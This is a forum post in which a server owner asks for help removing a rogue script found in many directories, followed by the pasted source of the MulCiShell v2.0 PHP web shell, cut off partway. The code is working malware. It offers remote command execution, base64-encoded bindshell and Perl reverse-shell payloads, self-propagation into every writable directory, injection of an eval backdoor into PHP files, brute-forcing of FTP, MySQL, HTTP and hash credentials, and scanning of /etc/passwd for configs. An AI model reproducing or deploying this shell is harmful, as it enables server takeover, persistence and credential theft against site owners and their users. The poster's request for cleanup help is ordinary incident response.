krispykreme Posted March 14, 2010 Share Posted March 14, 2010 Hello, I found this rogue script on my server. I tried to run it myself, but nothing really happend that I could tell. On one of the domains it was in EVERY directory, I see in the script where it spreads, but I was wondering if there would be an easier way to delete it since it is probably on my server in 500 different areas in the same name "sss.php" I'm thinking it got on my server sicne there is a directory that allows users to upload files with permissions to the folder "777" which i think is full, but I figured I'll fix that and make it so they can't execute in that folder? Either way let me know your thoughts. here is the code: <?php #/\/\/\/\/\ MulCiShell v2.0 /\/\/\/\/\/\/\# # Updates from version 1.0# # 1) Fixed MySQL insert function # 2) Fixed trailing dirs # 3) Fixed file-editing when set to 777 # 4) Removed mail function (who needs it?) # 5) Re-wrote & improved interface # 6) Added actions to entire directories # 7) Added config+forum finder # Added MySQL dump function # 9) Added DB+table creation, DB drop, table delete, and column+table count # 10) Updated security-info feature to include more useful details # 11) _Greatly_ Improved file browsing and handling # 12) Added banner # 13) Added DB-Parser and locator # 14) Added enumeration function # 15) Added common functions for bypassing security restrictions # 16) Added bindshell & backconnect (needs testing) # 17) Improved command execution (alts) #/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/# @ini_set("memory_limit","256M"); @set_magic_quotes_runtime(0); session_start(); ob_start(); $start=microtime(); if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme']; //Thanks korupt $backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9pZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yaygpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZHIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaWQgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9"; $backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0K"; $pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIGhvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcsDQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk="; $access_control=0; $md5_user="123"; $md5_pass="123"; $user_agent="MulCiber"; $allowed_addrs=array('127.0.0.1'); $shell_email="NeverAgain@hotmail.com"; $self=basename($_SERVER['PHP_SELF']); $addr=$_SERVER['REMOTE_ADDR']; $serv=@gethostbyname($_SERVER['HTTP_HOST']); $soft=$_SERVER['SERVER_SOFTWARE']; $safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON"; $open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON"; $uname=@php_uname(); $space=TrueSize(disk_free_space(realpath(getcwd()))); $total=TrueSize(disk_total_space(realpath(getcwd()))); $id=@execmd("id",$disable); $int_paths=array("mybb","phpbb","phpbb3","forum","forums","board","boards","bb","discuss"); $inc_paths=array("includes","include","inc"); $sql_build_path; echo "<script type=\"text/javascript\" language=\"javascript\"> function togglecheck() { var cb=document.forms[0].check for (i in cb) { cb[i].checked=(cb[i].checked)?false:true; } } </script>"; switch($access_control) #Break statements intentionally ommited { case 3: $ip_allwd=false; foreach($allowed_addrs as $addr) { if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;} if(!$ip_allwd) exit; } case 2: if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass) { header("WWW-Authenticate: Basic Realm=\"Restricted area\""); header("HTTP/1.1 401 Unauthorized"); echo "Wrong username/password"; exit; } case 1: if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit; } if($id) { $s=strpos($id,"(",0)+1; $e=strpos($id,")",$s); $idval=substr($id,$s,$e-$s); } $disable=@ini_get("disable_functions"); if(empty($disable)) $disable="None"; function rm_rep($dir,&$success,&$fail) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$rm=readdir($dh))) { if($rm=='.' || $rm=='..') continue; if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...</br>"; rm_rep($dir.'/'.$rm,$success,$fail); continue;} if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...</br>";} else {$fail++; echo "Failed to delete $rm</br>";} } @closedir($dh); } else echo "Failed to open dir $dir</br>"; } function chmod_rep($dir,&$success,&$fail,$mod_value) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$ch=readdir($dh))) { if($ch=='.' || $ch=='..') continue; if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...</br>"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;} if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...</br>";} else {$fail++; echo "Failed to chmod $rm</br>";} } @closedir($dh); } else echo "Failed to open dir $dir</br>"; } #Complete these functions function spread_self($user,&$c=0,$d=0) { if(!$d) $dir="/home/$user/public_html/"; else $dir=$d; if(is_dir($dir)&&is_writable($dir)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/SSS.php'); echo "[+] Shell copied to $dir.$f./SSS.php</br>"; $c++; } if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir</br>"; while((@$f=readdir($dh))) { if($f!="."&&$f!="..") { if(@is_dir($dir.$f)) { echo "[+] Spreading to dir $dir</br>"; if(@is_writable($dir.$f)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/SSS.php'); echo "[+] Shell copied to $dir.$f./SSS.php</br>"; $c++; } $c+=spread_self($user,$c,$dir.$f.'/'); } } } } function copy_rep($dir,&$c) { } function backup_site() { if(!isset($_POST['busite'])) { echo "<center>The following tool will attempt to retrieve every file from the specified dir (including child dirs).</br>If successful, you will be prompted for a site backup download.</br><i>Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.</i></center>"; } } function infect_rep($dir,&$success,&$fail) { } function copy_dir($dir,$new_dir) { } ################################## function execmd($cmd,$d_functions="None") { if($d_functions=="None") {$ret=passthru($cmd); return $ret;} $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd); return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; } } } return -1; } $links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode", "Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf", "Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill"); echo "<html><head><title>MulCiShell v2.0 -- VLinhT</title></head>"; switch($_SESSION['theme']) { case 'green': echo "<style> body{color:#66FF00; font-size: 12px; font-family: serif; background-color: black;} td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;} td:hover{background-color: black; color: #33FF00;} input{background-color: black; color: #00FF00; border: 1px solid green;} input:hover{background-color: #006600;} textarea{background-color: black; color: #00FF00; border: 1px solid white;} a {text-decoration: none; color: #66FF00; font-weight: bold;} a:hover {color: #00FF00;} select{background-color: black; color: #00FF00;} #main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;} #main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-family: arial; text-decoration: none; } #main a:hover{color: #00FF00; text-decoration: underline;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;} </style> <body>"; break; case 'dark': echo "<style> body{color: #FFFFFF; font-size: 12px; font-family: serif; background-color: #000000;} td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2px; font-size: 12px; color: #FFFFFF;} input{background-color: black; color: #FFFFFF;; border: 1px solid #FFFFFF;} input:hover{background-color: #000099;} textarea{background-color: #000000; color: #FFFFFF; border: 1px solid white;} a {text-decoration: none; color: #FFFFFF; font-weight: bold;} a:hover {font-weight: bold;} select{background-color: #000000; color: #FFFFFF;} #main{border-bottom: 1px solid white; padding: 5px; text-align: center;} #main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; font-family: arial; text-decoration: none; } #main a:hover{font-weight: bold;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;} </style><body>"; break; default: echo "<style> body{color: white; font-size: 12px; font-family: arial; scrollbar-base-color:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; } td {border: 1px solid #000099; background-color: #000033; padding: 2px; font-size: 12px; color: white; } input{background-color: black; color: white; border: 1px solid #000066;} input:hover{background-color: #000066; border: 1px solid white;} td:hover {color: yellow; background: black;} textarea{background-color: #000033; color: white; border: 1px solid white;} a {text-decoration: none; color: white; font-weight: bold;} a:hover {color: yellow} select{background-color: black; color: white;} #main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: center;} #main a{padding-right: 15px; color: white; font-size: 12px; font-family: arial; text-decoration: none; } #main a:hover{color: #0033FF; text-decoration: underline;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;} </style> <body bgcolor='black'>"; break; } echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "<table style='width: inherit; margin: auto; text-align: center;'> <tr><td>Server IP</td><td>Your IP</td><td>Disk space</td><td>Safe_mode?</td><td>Open_BaseDir?</td><td>System</td><td>Server software</td><td>Disabled functions</td><td>ID</td><td>Shell location</td></tr> <tr><td>$serv</td><td>$addr</td><td>$space of $total</td><td>$safe_mode</td><td>$open_basedir</td><td>$uname</td><td>$soft</td><td>$disable</td><td>$idval</td><td>".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."</td></tr> </table></br> <div id='main'>"; foreach($links as $val=>$addr) echo "<a href='$addr'>[ $val ]</a>"; echo "</div><br>"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "<form action='$self?' method='post'><center><textarea rows='19' cols='75' readonly>MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_decode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2Hex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."</textarea><br><br>Input: <input type='text' style='width: 300px' name='encrypt'> <br><input type='submit' value='Encrypt' name='encryption'></center>"; } if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable); if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully<br>"; else echo "Failed to upload file!"; } } if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect': #Nothing special here, just kick them while they're down foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,"<?php @eval(\$_GET['e']) ?>"); @fclose($fh); } else $fail++; } echo "Successfully infected $success files; failed to infect $fail files</br>Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted<br>"; $success++; } else { echo "Failed to delete file $file<br>"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files<br>"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file<br>"; $success++; } else { echo "Failed to change mode for $file<br>"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files<br>"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...</br>"; if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false; if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass<br>"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...</br>"; $show=0;} } } else echo "Failed to connect!</br>"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i<count($path);$i++) $full_path.='/'.$path[$i]; } elseif(isset($_POST['vbcrack'])) { if(empty($_POST['vbhash']) OR empty($_POST['vbsalt'])) die("Please specify a hash and salt"); while(!feof($list)) { $show++; $pass=trim(fgets($list)); $vbenc=md5(md5($pass).$_POST['vbsalt']); if($vbenc===$_POST['vbhash']) { echo "Password for $_POST[vbhash] found! is $pass</br>"; break; } if($show===10000) { $show=0; echo "Trying pass $pass...</br>"; } } echo "Complete</br>"; } elseif(isset($_POST['mysqlcrack'])) { $host=$_POST['mysql_host']; $user=$_POST['mysql_user']; if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]"; while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(@mysql_connect($host,$user,$pass)) { echo "Password found! Password for $user is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } elseif(isset($_POST['authcrack'])) { $arr=explode('/',$_POST['auth_url']); $con_url=$arr[0]; if(empty($_POST['auth_url'])) die("Enter a target first..."); for($i=1;$i<count($arr);$i++) $path.='/'.$arr[$i]; if(preg_match("/^http:\/\/+/",$_POST['auth_url'])) die("Do not include http:// in the url"); while(!feof($list)) { if(is_resource($conn_url=fsockopen($con_url,80,$errno,$errstr,5))) { $show++; $pass=trim(fgets($list)); if($show>5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'.$pass); $header="GET $path HTTP/1.1\r\n"; $header.="Host: $con_url\r\n"; $header.="Authorization: Basic $encode\r\n"; $header.="Connection: Close\r\n\r\n"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp)) { echo "Password found! Password=$pass</br></br>"; break 2; } } } } echo "Done</br>"; } elseif(isset($_POST['md5crack'])) { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one "); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one "); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type']) { case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open</br>"; $sport++; } break; default: echo "Invalid request</br>"; } } if(isset($_POST['find_forums'])) { echo "<center><b>[ Forum locator ]</b></center></br></br>"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path</br>"; $found++; continue; } } } } echo "Scan complete. Found $found forums</br></br>"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php</br>"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "<center><b>[ Config locator ]</b></center></br></br>"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs</br></br>"; } if(isset($_POST['execmd'])) {echo "<center><textarea rows='10' cols='100'>"; echo execmd($_POST['cmd'],$disable); echo "</textarea></center>";} if(isset($_POST['execphp'])) {echo "<center><textarea rows='10' cols='100'>"; echo eval(stripslashes($_POST['phpcode'])); echo "</textarea></center>";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created<br>"; else echo "Failed to create file<br>"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created<br>"; else echo "Failed to create directory<br>"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo "<center><form action='$self?act=backc' method='post'> Address: <input type='text' value='$_SERVER[REMOTE_ADDR]' name='backconnip'> Port: <input type='text' value='1337' name='backconnport'> <input type='submit' value='Connect'></br></br> Listen with netcat by executing 'nc -l -n -v -p 1337'</br></br> <b>Note: Be sure to foward your port first</b> </form></center>"; } else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...</br>"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FF0000'>Warning: Failed to delete reverse-connection program</font></br>"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...</br>"; if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.<br>"; break; case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo "<center><form action='?act=spread' method='post'> This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br> Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br> <input type='submit' value='Spread' name='spread_shell'> </form></center>"; } else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times</br>":"Failed to spread the shell.</br>"; } break; case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n"; $header.="Host: searchy.protecus.de\r\n"; $header.="Connection: Close\r\n\r\n"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break; case 'kill': if(!isset($_POST['justkill'])) { echo "<center>Do you *really* want to kill the shell?<br><br><form action='$self?act=kill' method='post'> <input type='submit' value='Yes' name='justkill'></center>"; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.<br>"; else echo "Failed to delete shell<br>"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON"; $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "<center>Security overview</center><table style='margin: auto;'><tr><td>PHP Version</td><td>Safe mode</td><td>Open_Basedir</td><td>Magic_Quotes</td><td>Register globals</td><td> Remote includes</td><td>Read /etc/passwd?</td><td>MySQL</td><td>cURL</td></tr> <tr><td>$ver</td><td>$safe_mode</td><td>$open_basedir</td><td>$magic_quotes_on</td><td>$register_globals_on</td><td>$include_on</td> <td>$etc_passwd</td><td>$mysql_on</td><td>$curl_on</td> </tr>"; "</table>"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: <a href='$URL'>$URL</a>"; } else echo "Enumeration failed<br>"; break; } echo "<br>"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected<br>"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");} else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");} $current=explode("/",$d); echo "<table style='width: 100%; text-align: center;'><tr><td>Current location: ";for($p=0;$p<count($current);$p++) for($p=0;$p<count($current);$p++) { $cPath.=$current[$p].'/'; echo "<a href=$self?d=$cPath>$current[$p]</a>/"; } echo "</td></tr></table>"; if(isset($_GET['d'])) echo "<form action='$self?d=$_GET[d]' method='post'>"; else echo "<form action='$self?' method='post'>"; echo "<table style='width: 100%'> <tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Writable</td><td>Modified</td><td>Action</td></tr>"; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,,2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo "<tr><td><a href='$self?act=files&d=$f'>..</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td>None</td></tr>"; continue; } echo "<tr><td><a href='$self?act=files&d=$d/$f'>$f</a> </td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>"; } foreach($files as $f) { 